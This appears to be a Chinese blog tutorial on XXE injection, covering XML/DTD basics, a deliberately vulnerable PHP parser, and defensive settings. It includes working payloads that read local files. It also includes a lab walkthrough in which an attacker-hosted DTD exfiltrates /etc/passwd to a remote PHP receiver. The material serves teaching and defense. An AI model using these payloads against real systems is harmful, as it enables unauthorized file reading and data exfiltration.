XML 外部实体注入---XXE

最新推荐文章于 2024-05-16 14:33:42 发布
最新推荐文章于 2024-05-16 14:33:42 发布
阅读量339 收藏 2
点赞数
分类专栏: 渗透测试 文章标签: XXE
只能看不能摸哟!
本文链接:https://blog.csdn.net/weixin_45677145/article/details/111638708
版权

文章目录

XML介绍及用途

XML 被设计用来传输和存储数据。XML文档形成了一种树结构,它从"根部"开始,然后扩展到"枝叶"。
XML 允许创作者定义自己的标签和自己的文档结构。

XML语法规则

  1. 所有的XML元素都必须有一个关闭标签
  2. XML 标签对大小写敏感
  3. XML必须正确嵌套
  4. XML属性值必须加引号
  5. 实体引用
  6. 在XML中,空格会被保留

XML元素介绍

XML元素指的是从(且包括)开始标签直到(且包括)结束标签的部分

每个元素又可以有对应的属性。XML属性必须加引号

注意:

  • XML文档必须有一个根元素
  • XML元素都必须有一个关闭标签
  • XML标签对大小写敏感
  • XML元素必须被正确的嵌套
  • XML属性值必须加引号
<?xml version="1.0" encoding="UTF-8"?>
<note>
<to>Tov</to>
<from>Jahi</from>
<heading>Reminder</heading>
<body>Don't forget me this weekend!</body>
</note>

XML DTD介绍

拥有正确语法的XML被称为"形式良好"的XML。通过DTD验证的XML是"合法"的XML。

DTD 声明类型

  • 内部的DOCTYPE声明:<!DOCTYPE root-element [element-declarations]>
<?xml version="1.0"?>
<!DOCTYPE note[
 <!ELEMENT note(to,from,heading,body)>
 <!ELEMENT to  (#PCDATA)>
 <!ELEMENT from (#PCDATA)>
 <!ELEMENT heading (#PCDATA)>
 <!ELEMENT body (#PCDATA)>
]>
<note>
<to>Tov</to>
<from>Jahi</from>
<heading>Reminder</heading>
<body>Don't forget me this weekend!</body>
</note>
  • 外部文档声明:假如DTD位于XML源文件的外部,那么它应通过下面的语法被封装在一个DOCTYPE定义中:<!DOCTYPE root-element SYSTEM "filename">

note.dtd文件

 <!ELEMENT note(to,from,heading,body)>
 <!ELEMENT to  (#PCDATA)>
 <!ELEMENT from (#PCDATA)>
 <!ELEMENT heading (#PCDATA)>
 <!ELEMENT body (#PCDATA)>

xml文件

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note SYSTEM "note.dtd">
<note>
<to>Tov</to>
<from>Jahi</from>
<heading>Reminder</heading>
<body>Don't forget me this weekend!</body>
</note>

DTD 数据类型

  • PCDATA 的意思是被解析的字符数据(parsed character data)。
    PCDATA是会被解析器解析的文本。这些文本将被解析器检查实体以及标记。

  • CDATA 的意思是字符数据(character data) 。
    CDATA是不会被解析器解析的文本。在这些文本中的标签不会被当作标记来对待,其中的实体也不会被展开

DTD 实体介绍

实体是用于定义引用普通文本或特殊字符的快捷方式的变量。

内部实体:<!ENTITY entity-name "entity-value">

外部实体:<!ENTITY entity-name SYSTEM "UR/URL">

XML 注入(XXE)产生的原理

XXE漏洞 全称XML External Entity Injection,即xml外部实体注入漏洞

XXE漏洞 发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。

XXE 漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。

简单的XXE 漏洞代码编写

file_get_contents()函数

file_get_contents()函数把整个文件读入一个字符串中。

file_get_contents(path,include_path,context ,start ,max_Length)

path             必选。规定要读取的文件
include_path     可选。如果也想在include_path中搜寻文件的话,可以将该参数设为"1"。
context          可选。规定文件句柄的环境。PHP5.0.0添加
                 context是一套可以修改流的行为的选项。若使用null,则忽略。
start            可选。规定在文件中开始读取的位置。该参数是PHP 5.1新加的。
max_length       可选。规定读取的字节数。该参数是PHP 5.1新加的。

php封装协议—php://input

php://input是个可以访问请求的原始数据的只读流。

结合file_get_contents(“php://input”)可以读取POST提交的数据。

<?php
$str = file_get_contents("php://input");
echo $str;
?>

在这里插入图片描述

simplexml_load_string()函数

php中的simplexmt_load_string()函数将xml格式字符串转换为对应的SimpleXMLElement对象

<?php
$str = <<<XML
<note>
<to>Tov</to>
<from>Jahi</from>
<heading>Reminder</heading>
<body>Don't forget me this weekend!</body>
</note>
XML;
$xml = simplexml_load_string($str);
var_dump($xml);
?>

在这里插入图片描述

XML 注入回显 输出函数

<?php
$xml = file_get_contents("php://input");
$data = simplexml_load_string($xml);
echo "<pre>";
var_dump($data);
echo "</pre>";
?>

构造payload:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe[
<!ELEMENT name ANY>
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini"><!--读取服务器本地文件-->
]>
<root>
<name>&xxe;</name> <!--&xxe;是引用外部的xxe-->
</root>

在这里插入图片描述

XXE 漏洞利用

任意文件读取

<?php
$xml = file_get_contents("php://input");
$data = simplexml_load_string($xml);
echo "<pre>";
var_dump($data);
echo "</pre>";
?>

测试poc:

读取本地文件
file:///path/to/file.ext
读取远程文件
http://url/file.ext
使用base64编码读取php文件
php://filter/read=convert.base64-encode/resource=conf.php

读取服务器本地文件(有回显)

构造payload:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE ANY[
<!ENTITY xxe SYSTEM "file:///c://test/flag.txt">
]>
<value>&xxe;</value>

在这里插入图片描述

pentesterlab的安装

镜像下载地址:https://isos.pentesterlab.com/play_xxe.iso
默认用户名和密码都是:pentestlab
在这里插入图片描述
打开虚拟机之后就可以用ip来进行访问:
在这里插入图片描述

测试原理

在这里插入图片描述
实验环境:

  • Attacker’s server:kali
  • 含有XXE的Server:pentesterlab

实验内容:
无回显的读取文件

请求XML文件:

<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://192.168.35.131/test.dtd">
<foo>&e1;</foo>

攻击者服务器DTD文件:

<!ENTITY % p1 SYSTEM "file:///etc/passwd">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://192.168.35.131/test.php?con=%p1;'>">
%p2;

在这里插入图片描述

攻击者服务器test.php文件:

<?php
echo $_GET['con'];
?>

在这里插入图片描述

开始实验:
在kali中访问含XXE的服务器登录并抓包:
在这里插入图片描述

输入请求XML之后进行发送并在攻击者服务器开启wireshark进行抓包分析:
在这里插入图片描述

XXE 防御策略

  • XXE 消亡的原因
    libxml 2.90以后,默认不解析外部实体,导致XXE漏洞逐渐消亡。
  • 使用开发语言提供的禁用外部实体的方法
PHP:
libxml_disable_entity_loader(true);

JAVA:
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);

Python:
from lxml import etree
xmIData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))
  • 过滤用户提交的XML数据
    关键词:<!DOCTYPE<!ENTITY或者SYSTEMPUBLIC
我是大肥鼠
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
file_get_contents()和file_put_contents() 的用法
qq_36627117的博客
07-01 3292
1、file_get_contents() 函数把整个文件读入一个字符串中。 file_get_contents() 函数是用于将文件的内容读入到一个字符串中的首选方法。如果操作系统支持,还会使用内存映射技术来增强性能。 file_get_contents(path,include_path,context,start,max_length) 参数 描述 path 必需。规定要读取的文件。 include_path 可选。如果也想在 include_path 中搜寻文件的话
xxe-injection-payload-list::bullseye:XML外部实体XXE注入有效负载列表
02-06
XML外部实体XXEXML External Entity Injection)是一种网络安全漏洞,它允许攻击者通过恶意构造的XML输入来访问和泄露服务器内部资源。XXE注入通常发生在应用解析不受信任的XML输入时,没有正确地限制XML解析器...
docker快速入门以及漏洞环境搭建
凝聚力安全团队
07-25 2784
docker快速入门 为什么要学习docker?   在渗透学习的路上,docker能够快速帮我们搭建环境
XML外部实体注入--XXE漏洞
最新发布
qq_62793621的博客
05-16 1401
XXE的原理及常见利用方式。
2020第五空间 web writeup
a3320315的博客
06-27 3323
hate-php 源码 <?php error_reporting(0); if(!isset($_GET['code'])){ highlight_file(__FILE__); }else{ $code = $_GET['code']; if (preg_match('/(f|l|a|g|\.|p|h|\/|;|\"|\'|\`|\||\[|\]|\_|=)/i',$code)) { die('You are too good for me');
XXE漏洞原理及常见利用方式(以xxe-lab为示例)
weixin_43610673的博客
03-11 2221
这是一个有回显的XXE,这里读的文件是比较理想的,没有会被xml解析的字符,如果像下图中文件的内容一样就会引起xml解析报错(如Linux的/etc/fstab文件其中包含一些看起来像 XML 的字符),XML 解析器会尝试解析这些元素,但其不是一个有效的 XML 文档。而XXE是将XML元素注入变成外部实体注入,上面的基础知识部分已经提到了在DTD中声明外部实体,在xml实体的作用相当于是一个已经定义的变量,可以在标签内使用,通过 & 符号进行引用。,是不会被解析器解析的文本。...
xxe 复习
m0_46580995的博客
03-11 241
XXE XXE攻击大多是由解析器发出外部资源请求而造成的。 引用外部实体时,引用SYSTEM、PUBLIC申请外部资源,利用其它协议造成的危害。 攻击方式 引用外部实体远程文件读取 url请求,造成ssrf攻击 使用expect直接执行命令 参数实体 Dos攻击 支持协议 ftp http php file 等 借用先知社区的图(https://xz.aliyun.com/t/3357#toc-9) 无回显的xxe 即通过协议来发送内容 vps端 test.dtd <!ENTITY %
WebGoat8-xxe注入漏洞分析
09-15
XXE 注入漏洞是基于 XML 外部实体的攻击,攻击者可以通过构造特殊的 XML 实体来读取服务器上的敏感信息。XML 外部实体XML 1.0 中的一种特性,允许开发者在 XML 文档中引入外部实体,以便在 XML 文档中使用外部...
WebSphere XML外部实体(XXE)注入漏洞(CVE-2020-4643)
10-25
WebSphere 9.0.0-9.0.5.5及8.5.0.0-8.5.5.18:更新安全补丁PH27509 WebSphere 8.0.0.0-8.0.0.15:升级到8.0.0.15版本,然后更新安全补丁PH27509 WebSphere 7.0.0.0-7.0.0.45:升级到7.0.0.45版本,然后更新安全补丁...
libxml2-2.9.13
07-14
9. **安全性**:libxml2关注安全问题,例如防止XXEXML外部实体注入)和XEE(XML实体扩展)攻击,通过配置选项可以禁用不安全的功能。 10. **API设计**:libxml2提供了清晰的C语言API,易于理解和使用。此外,它还...
CVE-2018-11788:Apache Karaf XXE漏洞(CVE-2018-11788)
03-18
在最近对Apache Karaf的研究中,我发现其XML解析器中存在一些XXEXML外部实体注入)漏洞。 导致解析器不正确地解析XML文档。受影响的版本Apache Karaf <= 4.2.1 Apache Karaf <= 4.1.6分析根据,Apache ...
区块链安全—详谈共识攻击(二)
Fly_鹏程万里
11-15 1589
上一篇文章中我们讲述了传统的Pow以及Pos相关的延伸共识算法。而在这篇文章中,我们讲述一下区块链的精髓PBFT以及其延伸算法。 在安全方面,我们给大家科普一下日蚀攻击已经贿赂攻击。并且一步一步带大家复现一下前些日子爆出的区块链整数溢出攻击。希望大家能够从文章中了解到区块链的共识算法,并对相应的攻击手段有所掌握。 为了便于初学者接受,文章选择从基础开始讲起。有需要讨论的同学下方留言即可。...
XML外部实体注入漏洞——XXE简单分析
未完成的歌~的博客
02-01 1194
前言: 前几天做了南邮 NJUPT CTF的几道题,感觉自己要学的的东西还有太多!今天借着比赛中的一道Web题 来系统的学习下XML外部实体注入(XML External Entity Injection) 题目:Fake XML cookbook 题目:Fake XML cookbook 平台暂时还未关闭,想要复现的抓紧了! 网址:https://nctf.x1c.club/challenges#Web ...
(十二)XML外部实体XXE注入
weixin_43047908的博客
04-16 1752
目录一、什么是XML外部实体注入?二、XXE漏洞如何产生?什么是XML?什么是XML实体?什么是文件类型定义(DTD)?什么是XML自定义实体?什么是XML外部实体?三、XXE攻击有哪些类型?利用XXE检索文件利用XXE执行SSRF攻击四、寻找用于XXE注入的隐藏攻击面XInclude攻击通过文件上传进行XXE攻击通过修改的内容类型进行XXE攻击五、如何预防XXE漏洞 一、什么是XML外部实体注入XML外部实体注入(也称为XXE)是一个Web安全漏洞,它使攻击者能够干扰应用程序对XML数据的处理。它通
XML外部实体注入学习
paidx0
08-26 1556
前言 最近做题做到XXE 这类型的题,也没有系统学习过,只是简单知道他和 XML 有关,这次就了解了一下XXE 漏洞 简单了解XML XML 指可扩展标记语言(EXtensible Markup Language) XML 是一种标记语言,很类似 HTML XML 被设计为传输和存储数据,其焦点是数据的内容 XML 被设计用来结构化、存储以及传输信息 XML 允许创作者定义自己的标签和自己的文档结构 XML的优点 xml是互联网数据传输的重要工具,它可以跨越互联网任何的平台,不受编程语言和操作系统的限制,
从一道题目学习XXE漏洞
蚁景网安学院
03-01 514
本文涉及知识点实操练习:XXE漏洞分析与实践 (通过该实验了解XXE漏洞的基础知识及演示实践。) 0x01.xxe漏洞 XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。 0x02.xml
Xml实体注入漏洞姿势总结
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
03-08 5474
Xml实体注入漏洞姿势总结
【每天学习一点新知识】XXEXML外部实体注入)从入门到放弃
RexHa的博客
10-29 2105
XML 指可扩展标记语言(EXtensibleMarkupLanguage)XML 是一种标记语言,很类似 HTMLXML 的设计宗旨是传输数据,而非显示数据XML 标签没有被预定义。您需要自行定义标签。XML 被设计为具有自我描述性。XML 是W3C 的推荐标准XML——XML介绍和基本语法_KLeonard的博客-CSDN博客_xml本文介绍了XML语言的历史,以及它的作用和常见的应用。重点介绍了XML文件的语法规则。
XXE漏洞学习及利用
qq_38352420的博客
06-30 416
XXE漏洞基础学习 当WEB服务使用XML或者JSON中的一种进行传输时,服务器可能会接收开发人员并未预料到的数据格式。如果服务器上的XML解析器的配置不完善,在JSON传输的终端可能会遭受XXE攻击,也就是俗称的XML外部实体攻击。 XXE是一种针对XML终端实施的攻击,黑客想要实施这种攻击,需要在XML的payload包含外部实体声明,且服务器本身允许实体扩展。这样的话,黑客或许能读取WEB服务器的文件系统,通过UNC路径访问远程文件系统,或者通过HTTP/HTTPS连接到任意主机。 所以学习XXE漏.
XML外部实体注入漏洞原理
05-24
XML外部实体注入漏洞(XML External Entity Injection, 简称XXE)是一种常见的安全漏洞,攻击者可以利用这种漏洞来读取任意文件、执行系统命令等操作。 在XML文档中,可以通过定义实体来引用外部资源,例如文件、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值